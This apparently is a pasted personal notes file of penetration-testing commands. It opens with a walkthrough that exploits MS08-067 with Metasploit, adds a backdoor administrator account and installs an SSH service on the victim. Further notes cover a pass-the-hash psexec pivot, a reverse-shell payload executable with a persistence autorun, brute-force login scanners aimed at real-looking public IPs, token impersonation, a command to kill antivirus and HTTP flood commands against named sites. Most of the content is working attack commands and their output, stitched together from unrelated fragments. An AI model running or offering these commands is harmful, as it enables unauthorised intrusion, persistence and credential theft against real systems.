  1321.  
  1322.  
  1323. Performing an installation via command shell
  1324.  
  1325. Now that you have all of this data saved on your USB thumb drive, lets assume that our penetration testing machine is a CentOS Linux operating system with IP address of 192.168.1.37, and that our target is a Windows 2003 SP0 machine with IP address of 192.168.1.40. Our penetration testing Linux machine has our OpenSSH package files mounted under /mnt/PenTestTools/win32/OpenSSH.
  1326.  
  1327. Our target happens to have the MS08-067 Server Service RPC vulnerability. Below is an example of how we exploit this vulnerability using Metasploit (www.metasploit.com) with the Meterpreter payload, upload our OpenSSH server files, add a new username, perform some minimal configuration and start the OpenSSH service.
  1328.  
  1329.  
  1330. Exploiting the Vulnerability
  1331.  
  1332. [root@localhost framework-3.2]# nc -v 192.168.1.40 445
  1333. Connection to 192.168.1.40 445 port [tcp/microsoft-ds] succeeded!
  1334. [root@localhost framework-3.2]# ./msfconsole
  1335.  
  1336. msf > search exploits ms08_067
  1337. [*] Searching loaded modules for pattern 'ms08_067'...
  1338. Exploits
  1339. ========
  1340. Name Description
  1341. ---- -----------
  1342. windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption
  1343. msf > use windows/smb/ms08_067_netapi
  1344.  
  1345. msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
  1346. PAYLOAD => windows/meterpreter/bind_tcp
  1347. msf exploit(ms08_067_netapi) > set RHOST 192.168.1.40
  1348. RHOST => 192.168.1.40
  1349. msf exploit(ms08_067_netapi) > set TARGET 5
  1350. TARGET => 5
  1351. msf exploit(ms08_067_netapi) > show options
  1352.  
  1353. ... truncated output ...
  1354. Exploit target:
  1355.  
  1356. Id Name
  1357. -- ----
  1358. 5 Windows 2003 SP0 Universal
  1359.  
  1360.  
  1361. msf exploit(ms08_067_netapi) > exploit
  1362. [*] Started bind handler
  1363. [*] Triggering the vulnerability...
  1364. [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
  1365. [*] Sending stage (2650 bytes)
  1366. [*] Sleeping before handling stage...
  1367. [*] Uploading DLL (75787 bytes)...
  1368. [*] Upload completed.
  1369. [*] Meterpreter session 1 opened (192.168.1.37:45633 -> 192.168.1.40:4444)
  1370.  
  1371. meterpreter > sysinfo
  1372. Computer: SYSTEM-HJ28HHGL7N
  1373. OS : Windows .NET Server (Build 3790, ).
  1374.  
  1375.  
  1376. Uploading your OpenSSH Files
  1377.  
  1378. meterpreter > lcd /mnt/PenTestTools/win32/OpenSSH
  1379. meterpreter > lpwd
  1380. /mnt/PenTestTools/win32/OpenSSH
  1381. meterpreter > cd \
  1382. meterpreter > cd "Program Files"
  1383. meterpreter > mkdir openssh
  1384. Creating directory: openssh
  1385. meterpreter > cd openssh
  1386. meterpreter > pwd
  1387. C:\Program Files\openssh
  1388. meterpreter > upload -r . .
  1389. [*] uploading : ./uninstall.exe -> .\uninstall.exe
  1390. [*] uploaded : ./uninstall.exe -> .\uninstall.exe
  1391. [*] mirroring : ./bin -> .\bin
  1392. [*] uploading : ./bin/chmod.exe -> .\bin\chmod.exe
  1393. [*] uploaded : ./bin/chmod.exe -> .\bin\chmod.exe
  1394. [*] uploading : ./bin/chown.exe -> .\bin\chown.exe
  1395. [*] uploaded : ./bin/chown.exe -> .\bin\chown.exe
  1396. [*] uploading : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
  1397. [*] uploaded : ./bin/cygcrypto-0.9.7.dll -> .\bin\cygcrypto-0.9.7.dll
  1398. .... lots of output truncated ....
  1399.  
  1400. meterpreter > execute -f cmd.exe .i
  1401. Process 848 created.
  1402. Channel 66 created.
  1403.  
  1404.  
  1405.  
  1406. Modifying the Registry and Adding Your Own Username
  1407.  
  1408. Here, we import all of our registry keys, then add our own username making sure to put it into the administrators group. Then we create the passwd and group files that OpenSSH needs for authentication purposes.
  1409.  
  1410.  
  1411. Microsoft Windows [Version 5.2.3790]
  1412. (C) Copyright 1985-2003 Microsoft Corp.
  1413. C:\Program Files\openssh>whoami
  1414. whoami
  1415. nt authority\system
  1416.  
  1417. C:\Program Files\openssh>reg import openssh.reg
  1418. reg import openssh.reg
  1419. The operation completed successfully.
  1420.  
  1421. C:\Program Files\openssh>net user inet_p0wned gameover /add
  1422. net user inet_p0wned gameover /add
  1423. The command completed successfully.
  1424.  
  1425.  
  1426. C:\Program Files\openssh>net localgroup administrators inet_p0wned /add
  1427. net localgroup administrators inet_p0wned /add
  1428. The command completed successfully.
  1429.  
  1430.  
  1431. C:\Program Files\openssh>cd etc
  1432. cd etc
  1433.  
  1434. C:\Program Files\openssh\etc>..\bin\mkpasswd -l >passwd
  1435. ..\bin\mkpasswd -l >passwd
  1436. C:\Program Files\openssh\etc>..\bin\mkgroup -l >group
  1437. ..\bin\mkgroup -l >group
  1438.  
  1439. C:\Program Files\openssh\etc>sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
  1440. sc create opensshd binpath= "c:\program files\openssh\bin\cygrunsrv.exe" start= auto
  1441. [SC] CreateService SUCCESS
  1442.  
  1443.  
  1444.  
  1445. Start the OpenSSH Service
  1446.  
  1447. C:\Program Files\openssh\etc>sc start opensshd
  1448. sc start opensshd
  1449. SERVICE_NAME: opensshd
  1450. TYPE : 10 WIN32_OWN_PROCESS
  1451. STATE : 2 START_PENDING
  1452. (NOT_STOPPABLE, NOT_PAUSABLE,
  1453. IGNORES_SHUTDOWN))
  1454. WIN32_EXIT_CODE : 0 (0x0)
  1455. SERVICE_EXIT_CODE : 0 (0x0)
  1456. CHECKPOINT : 0x0
  1457. WAIT_HINT : 0x7d0
  1458. PID : 1916
  1459. FLAGS :
  1460.  
  1461. C:\Program Files\openssh\etc>sc query opensshd
  1462. sc query opensshd
  1463. SERVICE_NAME: opensshd
  1464. TYPE : 10 WIN32_OWN_PROCESS
  1465. STATE : 4 RUNNING
  1466. (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN))
  1467. WIN32_EXIT_CODE : 0 (0x0)
  1468. SERVICE_EXIT_CODE : 0 (0x0)
  1469. CHECKPOINT : 0x0
  1470. WAIT_HINT : 0x0
  1471.  
  1472. C:\Program Files\openssh\etc>netsh firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24
  1473.  
  1474. The following command was not found: firewall add port protocol=tcp port=22 name=sshd mode=enable scope=custom addresses=192.168.1.0/24**
  1475.  
  1476. **Note: adding a port for the firewall is necessary if the firewall exists. If not, then you will get the command not found error message. It is a good idea to restrict the source networks so that you don.t leave a gaping opportunity while testing.
  1477.  
  1478. C:\Program Files\openssh\etc>exit
  1479. exit
  1480. meterpreter > quit
  1481.  
  1482. [*] Meterpreter session 1 closed.
  1483. msf exploit(ms08_067_netapi) > quit
  1484.  
  1485.  
  1486.  
  1487.  
  1488.  
  1489. Now, lets go ahead and SSH into our Windows server to check if things worked!
  1490.  
  1491.  
  1492. root@localhost:~/framework-3.2]# ssh inet_p0wned@192.168.1.40
  1493. The authenticity of host '192.168.1.40 (192.168.1.40)' can't be established.
  1494. RSA key fingerprint is ab:c8:bf:9f:b2:38:32:1d:6f:2b:34:a5:d0:99:dc:49.
  1495. Are you sure you want to continue connecting (yes/no)? yes
  1496. Warning: Permanently added '192.168.1.40' (RSA) to the list of known hosts.
  1497.  
  1498. OpenSSH for Windows. Welcome aboard!
  1499.  
  1500. inet_p0wned@192.168.1.40's password:
  1501. Could not chdir to home directory /home/inet_p0wned: No such file or directory
  1502. Microsoft Windows [Version 5.2.3790]
  1503. (C) Copyright 1985-2003 Microsoft Corp.
  1504. C:\Program Files\OpenSSH>
  1505. C:\Program Files\OpenSSH>whoami
  1506. system-hj28hhgl7n\inet_p0wned
  1507.  
  1508. C:\Program Files\OpenSSH>exit
  1509. Connection to 192.168.1.40 closed.
  1510. [root@localhost framework-3.2]#
  1511.  
  1512.  
  1513. Cleaning up
  1514.  
  1515. To clean up everything when you are finished, you need to delete the OpenSSH service, delete the registry keys and remove all of the relevant files. The following recipe should work reasonably well from a command shell. Remember that you cannot be using OpenSSH when deleting the service! So, you may need to exploit again with shell code before removing it.
  1516.  
  1517. C:\> SC STOP opensshd
  1518. C:\> SC DELETE opensshd
  1519. C:\> REG DELETE .HKLM\SOFTWARE\Cygnus Solutions. /f /va
  1520. C:\> REG DELETE .HKLM\SYSTEM\ControlSet001\Services\OpenSSHd. /f /va
  1521. C:\> REG DELETE .HKLM\SYSTEM\CurrentControlSet\Services\OpenSSHd. /f /va
  1522.  
  1523. C:\> CD "\Program Files"
  1524. C:\Program Files> RMDIR /Q /S opensshd
  1525. C:\Program Files> NETSH FIREWALL DELETE PORT TCP 22
  1526. C:\Program Files> NET USER inet_p0wned /DELETE # pivot
  1527. http://www.offensive-security.com/metasploit-unleashed/Pivoting
  1528.  
  1529. use exploit/windows/smb/psexec
  1530. set RHOST 10.1.13.2
  1531. set SMBUser Administrator
  1532. set SMBPass 81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d
  1533. set PAYLOAD windows/meterpreter/bind_tcp
  1534. exploit
  1535.  
  1536.  
  1537.  
  1538. # make exe
  1539. ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.6.55 LPORT=443 R | ./msfencode -t exe -c 5 -o /tmp/bob.exe
  1540.  
  1541. # attacker listen
  1542. use exploit/multi/handler
  1543. set PAYLOAD windows/meterpreter/reverse_tcp
  1544. set LHOST 192.168.6.55
  1545. set LPORT 443
  1546. set ExitOnSession false
  1547. # set AutoRunScript pathto script you want to autorun after exploit is run
  1548. set AutoRunScript persistence -r 192.168.6.55 -p 443 -A -X -i 30
  1549.  
  1550. exploit -j -z
  1551.  
  1552.  
  1553. # armatage
  1554. apt-get install mysql-server -y
  1555. /etc/init.d/mysql start
  1556.  
  1557. mysqladmin -u root -ppassword password toor
  1558.  
  1559.  
  1560. /pentest/exploits/framework/msfrpcd -f -U msf -P test -t Basic
  1561.  
  1562.  
  1563.  
  1564. # armatage
  1565.  
  1566. apt-get install -y postgresql
  1567.  
  1568. apt-get install libpq-dev -y
  1569.  
  1570. gem install postgres
  1571.  
  1572. /etc/init.d/postgresql start
  1573.  
  1574.  
  1575. su -
  1576. su - postgres
  1577.  
  1578.  
  1579. createuser msf_user -P
  1580. createdb --owner=msf_user msf
  1581.  
  1582.  
  1583.  
  1584. /pentest/exploits/framework/msfrpcd -f -U msf -P msf -t Basic
  1585. /pentest/exploits/framework/armitage
  1586.  
  1587.  
  1588.  
  1589.  
  1590. net user newuserhere PASSWORDHERE /add
  1591. net localgroup administrators newuserhere /add
  1592.  
  1593.  
  1594. "c:\program files\nmap\nmap.exe" -vvv -n -p 1527,3200,3201,3300,3600,8000,8100,8101,40000-40005,50013,50113 -A 192.168.56,14,6,7,8,9.1-255 -oA sap
  1595.  
  1596. ----
  1597.  
  1598.  
  1599.  
  1600.  
  1601. # ssh
  1602. use auxiliary/scanner/ssh/ssh_login
  1603.  
  1604. #set RHOSTS_FILE "C:/backup/wordlist/targests.txt"
  1605.  
  1606.  
  1607. set RHOSTS 4.59.139.135 4.59.139.136 4.59.139.140 63.116.61.25 63.116.61.26 63.116.61.34
  1608. # set USER_FILE "C:/backup/wordlist/password_large.txt"
  1609. set USERPASS_FILE "C:/backup/wordlist/root_userpass.txt"
  1610. set VERBOSE true
  1611. set STOP_ON_SUCCESS true
  1612. set BRUTEFORCE_SPEED 5
  1613. # set this to the number of host
  1614. set THREADS 6
  1615.  
  1616. run
  1617.  
  1618.  
  1619.  
  1620. use auxiliary/gather/dns_enum
  1621. set DOMAIN domain.com
  1622. run
  1623.  
  1624.  
  1625. #smb
  1626.  
  1627. use auxiliary/scanner/smb/smb_login
  1628.  
  1629. set RHOSTS file://192.168.8.39
  1630. set RHOSTS 127.0.0.1
  1631.  
  1632. set USER_FILE "C:/wordlist/users.txt"
  1633. set PASS_FILE "C:/wordlist/2.txt"
  1634. set VERBOSE false
  1635. # set to number of host scanning .
  1636. set THREADS 16
  1637.  
  1638. set STOP_ON_SUCCESS true
  1639. set VERBOSE true
  1640. set BLANK_PASSWORDS false
  1641.  
  1642.  
  1643. # http
  1644.  
  1645. use auxiliary/scanner/http/http_login
  1646. set AUTH_URI /folder?dcPath=ha-datacenter
  1647. set RHOSTS 127.0.0.1 127.0.0.1 127.0.0.1
  1648. set VERBOSE true
  1649. run
  1650.  
  1651.  
  1652.  
  1653.  
  1654. back
  1655.  
  1656. # telnet
  1657. use auxiliary/scanner/telnet/telnet_login
  1658. set RHOSTS 127.0.0.1,49,50
  1659.  
  1660. set PASS_FILE "C:/wordlist/password_small.txt"
  1661. set THREADS 254
  1662. run
  1663.  
  1664.  
  1665.  
  1666. back
  1667.  
  1668.  
  1669. # mssql
  1670. use auxiliary/scanner/mssql/mssql_login
  1671. set RHOSTS 127.0.0.1
  1672. set PASS_FILE "C:/wordlist/password_small.txt"
  1673. set USERNAME sa
  1674. set VERBOSE false
  1675. run
  1676.  
  1677.  
  1678. back
  1679.  
  1680.  
  1681.  
  1682. #ftp
  1683. use auxiliary/scanner/ftp/ftp_login
  1684. set RHOSTS  127.0.0.1
  1685. set PASS_FILE /home/administrator/alcoa/alcoa_small.txt
  1686. set USER_FILE /home/administrator/alcoa/alcoa_small.txt
  1687. set BRUTEFORCE_SPEED 1
  1688. run
  1689.  
  1690.  
  1691.  
  1692. #snmp
  1693. use auxiliary/scanner/snmp/snmp_login
  1694. set RHOSTS  127.0.0.1
  1695. set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
  1696. set VERBOSE false
  1697.  
  1698. run
  1699.  
  1700.  
  1701.  
  1702. nmap --script=smtp-open-relay.nse -p 25 -iL 25 -n
  1703.  
  1704.  
  1705. ./sfuzz -T O -f sfuzz-sample/basic.http -S 50.74.10.218 -p 179
  1706.  
  1707.  
  1708. #  onlt works for Delegation Tokens  
  1709. list_tokens -u
  1710. impersonate_token ORACLE-ENT\\Administrator
  1711.  
  1712.  
  1713. # after hijack incognito
  1714. use auxiliary/server/capture/smb
  1715.  
  1716. # ubuntu autopwn
  1717. apt-get install  ruby1.8-dev libpq-dev postgresql -y
  1718. gem install postgres
  1719.  
  1720.  
  1721. # download autopwn .
  1722. cd /pentest/exploits/framework/plugins/
  1723. wget http://rmccurdy.com/scripts/db_autopwn.rb
  1724. cd ..
  1725.  
  1726.  
  1727.  
  1728. sudo -u postgres psql
  1729. \password postgres
  1730. \q
  1731.  
  1732.  
  1733. sudo -u postgres createdb   msf
  1734.  
  1735. ./msfconsole
  1736.  
  1737. db_driver
  1738. db_driver postgresql
  1739. db_connect postgres:postgres@127.0.0.1/msf
  1740. db_nmap 123.123.123.123 -v -v -v -v
  1741. load db_autopwn
  1742. db_autpown -p -t -e
  1743.  
  1744.  
  1745. # ssh logins
  1746. use auxiliary/scanner/ssh/ssh_login
  1747. set RHOSTS 192.168.1.1-255
  1748. set USER_FILE "C:/wordlist/password_small.txt"
  1749. run
  1750.  
  1751.  
  1752.  
  1753. back
  1754.  
  1755. #smb
  1756. use auxiliary/scanner/smb/smb_login
  1757. set RHOSTS 127.0.0.1
  1758. set SMBUser Administrator
  1759. set PASS_FILE "C:/wordlist/password_small.txt"
  1760. set VERBOSE false
  1761. set THREADS 16
  1762. run
  1763.  
  1764.  
  1765.  
  1766. back
  1767.  
  1768. # telnet
  1769. use auxiliary/scanner/telnet/telnet_login
  1770. set RHOSTS 127.0.0.1
  1771. set PASS_FILE "C:/wordlist/password_small.txt"
  1772. set THREADS 254
  1773. run
  1774.  
  1775.  
  1776.  
  1777. back
  1778.  
  1779.  
  1780. # mssql
  1781. use auxiliary/scanner/mssql/mssql_login
  1782. set RHOSTS 127.0.0.1
  1783. set PASS_FILE "C:/wordlist/password_small.txt"
  1784. set USERNAME sa
  1785. run
  1786.  
  1787.  
  1788. back
  1789.  
  1790.  
  1791.  
  1792. #ftp
  1793. use auxiliary/scanner/ftp/ftp_login
  1794. set RHOSTS 127.0.0.1
  1795. set PASS_FILE "C:/wordlist/password_small.txt"
  1796. run
  1797.  
  1798.  
  1799.  
  1800. #snmp
  1801. use auxiliary/scanner/snmp/snmp_login
  1802. set RHOSTS 127.0.0.1
  1803. set PASS_FILE "C:/wordlist/snmp_default_pass.txt"
  1804. run
  1805.  
  1806.  
  1807.  
  1808.  
  1809. User Summary
  1810.  
  1811. Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
  1812. Example Usage
  1813.  
  1814. nmap -sV -sC <target>
  1815.  
  1816. db_driver postgresql
  1817. db_connect postgres:"msf3:"32a771f6"@127.0.0.1:7175/msf3
  1818.  
  1819. http://www.microsoft.com/download/en/details.aspx?displaylang=en&id=7558 Microsoft Baseline Security Analyzer 2.2 (for IT Professionals)
  1820.  
  1821. .a/gxfr.py kpmg.com  --dns-lookup -v -t 10
  1822.  
  1823.  
  1824. http stress test
  1825. .- HTTPS Support
  1826. - 1000 simultaneous connections (each one with a different user/password)
  1827. - Ability to record 2 or more application forms in order to test very specific application flows..
  1828.  
  1829. In order to answer your question, there.re some tools like:
  1830.  
  1831. Tool 1- httperf
  1832.  
  1833. More examples that I used before.
  1834.  
  1835. httperf --hog --server HOST --num-conn 1000 --ra 100 --timeout 5
  1836. httperf --hog --server 192.168.1.3 --num-conn 1000 --ra 100 --timeout 5
  1837. httperf --hog --server=192.168.1.3 --wsess=10,5,2 --rate 1 --timeout 5
  1838. httperf --hog --server=www --wsess=10,5,2 --rate=1 --timeout=5 --ssl
  1839. httperf  --hog  --server=bankinghome.es/apl/donativos/index_ca.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0
  1840. httperf  --hog  --server=17.148.71.129/index.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0
  1841. httperf  --hog  --server=http://17.148.71.129/index.html  --wsess=10,5,2 --rate=1 --timeout=5 --ssl --ssl-ciphers=EXP-RC4-MD5:EXP-RC2-CBC-MD5  --ssl-no-reuse --http-version=1.0
  1842.  
  1843. Tool 2- fakeconnect
  1844.  
  1845. fakeconnect -s SOURCE -d HOST -p PORT
  1846.  
  1847. Tool 3- Apache benchmarking tool (accept POST)
  1848.  
  1849. ab -n 100 -c 4 -p test.jpg http://localhost/
  1850. (http://httpd.apache.org/docs/2.0/programs/ab.html)
  1851.  
  1852. Tool 4- Curl-loader (it rocks, very customizable)
  1853.  
  1854. http://curl-loader.sourceforge.net/
  1855.  
  1856.  
  1857. And running hundreds and thousands of clients..., please, do not forget:
  1858.  
  1859. 1- To increase limit of descriptors (sockets) by running e.g.
  1860.  
  1861. #ulimit -n 10000;
  1862.  
  1863. 2- Optionally, to set reuse of sockets in time-wait state, etc.., by setting:
  1864.  
  1865. #echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle and/or
  1866. #echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse;
  1867. #echo 1 > /proc/sys/net/ipv4/tcp_moderate_rcvbuf
  1868. #echo 108544 > /proc/sys/net/core/wmem_max
  1869. #echo 108544 > /proc/sys/net/core/rmem_max
  1870. #echo "4096 87380 4194304" > /proc/sys/net/ipv4/tcp_rmem
  1871. #echo "4096 16384 4194304" > /proc/sys/net/ipv4/tcp_wmem
  1872.  
  1873. Additional info:
  1874.  
  1875. http://ltp.sourceforge.net/tooltable.php
  1876.  
  1877. Hope that help you.
  1878.  
  1879.  
  1880.  
  1881. ==========
  1882.  
  1883.  
  1884. random file raname rename random file
  1885. IFS=$'\n';for fname in `ls`; do mv "$fname" $RANDOM$RANDOM ;done
  1886.  
  1887.  
  1888. grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' ips | sort | uniq
  1889.  
  1890.  
  1891. catchme.exe  -K "c:\Program Files\Kaspersky\avp.exe"
  1892. catchme.exe  -E "c:\Program Files\Kaspersky\avp.exe"
  1893. catchme.exe  -O "c:\Program Files\Kaspersky\avp.exe"
  1894. reboot
  1895. still looking into it .. can't kill it from memory yet I can delete the file
  1896.  
  1897.  
  1898.  
  1899. # file size search
  1900. FOR /R C:\ %i in (*) do @if %~zi gtr 10000000 echo %i %~zi
  1901.  
  1902. # screen cron
  1903. @reboot /usr/bin/screen -fa -d -m -S torrent /usr/bin/rtorrent
  1904.  
  1905.  
  1906. # netstat with pid
  1907. for /f "tokens=1,2,3,7 delims=: " %a in ('netstat -nao ^| find ^"LISTENING^" ^| find /v ^"::^"') do @(for /f "tokens=1,*" %n in ('"wmic process where processId=%d get caption,executablepath | find ".""') do @echo Protocol=%a, IP=%b, Port=%c, PID=%d, Name=%n, Path=%o)
  1908.  
  1909.  
  1910. # CSV file size,file
  1911. for /r c:\ %i in (*) do @echo %~zi, %i
  1912.  
  1913. # md5 check but in linux style
  1914. md5 * | awk '{print $4,$2}' | sed 's/ (/ \*/g' | sed 's/)//g'
  1915.  
  1916.  
  1917.  
  1918. #################
  1919. # see ./fu_ripp.txt for ripped fu the size was getting out of hand ..
  1920. #################
Add Comment
Please, Sign In to add comment